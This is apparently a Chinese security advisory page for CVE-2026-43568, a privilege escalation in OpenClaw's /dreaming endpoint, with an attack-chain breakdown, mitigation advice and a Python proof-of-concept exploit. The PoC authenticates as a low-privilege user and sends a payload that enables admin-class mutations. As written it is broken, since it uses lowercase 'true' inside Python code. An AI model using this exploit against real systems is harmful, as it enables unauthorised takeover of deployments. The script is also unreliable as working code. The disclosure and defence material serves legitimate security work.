IPBUF安全漏洞报告
English
CVE-2026-43568 CVSS 6.5 中危

CVE-2026-43568 OpenClaw权限提升漏洞

披露日期: 2026-05-05

漏洞信息

漏洞编号
CVE-2026-43568
漏洞类型
权限提升
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

权限提升OpenClawCVE-2026-43568配置错误

漏洞概述

OpenClaw在2026.4.5至2026.4.10之前的版本中存在权限提升漏洞。由于系统对/dreaming端点的权限校验存在逻辑缺陷,拥有写入范围网关访问权限的攻击者可利用此漏洞修改持久内存的Dreaming设置。攻击者通过发送特制请求切换管理员级别的配置变更,从而在无需高权限的情况下提升至管理员权限,严重影响系统完整性。

技术细节

该漏洞位于OpenClaw的/dreaming端点处理逻辑中。系统在处理针对该端点的请求时,仅检查了用户是否具备基本的网关写入权限(PR:L),而未对修改“持久内存Dreaming设置”这一高敏感操作进行二次鉴权。攻击者首先需要获取一个具有低权限网关访问的账号,随后构造包含恶意配置的HTTP请求发送至/dreaming接口。由于存在逻辑漏洞,系统错误地允许低权限用户执行管理员级别的配置变更操作。攻击者可借此开启受保护的管理功能,导致权限提升。CVSS向量CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N表明攻击无需用户交互,且对完整性影响极高。

攻击链分析

STEP 1
Reconnaissance
攻击者识别出目标运行的是OpenClaw受影响版本(2026.4.5),并获取了一个具有写入范围网关访问权限的低权限账号。
STEP 2
Exploitation
攻击者向/dreaming端点发送特制的HTTP PUT/POST请求,请求中包含将'allow_admin_class_mutations'设置为true的载荷。
STEP 3
Privilege Escalation
由于权限校验绕过,系统接受了低权限用户的修改请求,更新了持久内存中的配置,赋予当前会话管理员级别的变更权限。
STEP 4
Impact
攻击者利用获取的管理员权限控制系统,篡改核心配置或进一步横向移动,严重破坏系统完整性。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit Title: OpenClaw Privilege Escalation via /dreaming (CVE-2026-43568) # Description: Exploit script to escalate privileges by toggling admin settings. target = "http://vulnerable-host:8080" login_url = f"{target}/api/login" dreaming_url = f"{target}/api/dreaming" # 1. Authenticate as a low-privilege user with write-scoped access creds = {"username": "user", "password": "password"} session = requests.Session() session.post(login_url, json=creds) # 2. Send payload to /dreaming endpoint to enable admin mutations payload = { "persistent_memory": { "dreaming_mode": "active", "allow_admin_class_mutations": true # Malicious toggle } } response = session.put(dreaming_url, json=payload) if response.status_code == 200 and "admin" in response.json().get("role", ""): print("[+] Exploit successful! Privileges escalated.") else: print("[-] Exploit failed.")

影响范围

OpenClaw 2026.4.5
OpenClaw < 2026.4.10

防御指南

临时缓解措施
建议立即升级到修复版本。如果无法立即升级,应在网络边界(如WAF或防火墙)上阻断对/dreaming路径的访问请求,并密切监控系统日志中是否存在针对该端点的异常配置修改记录。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表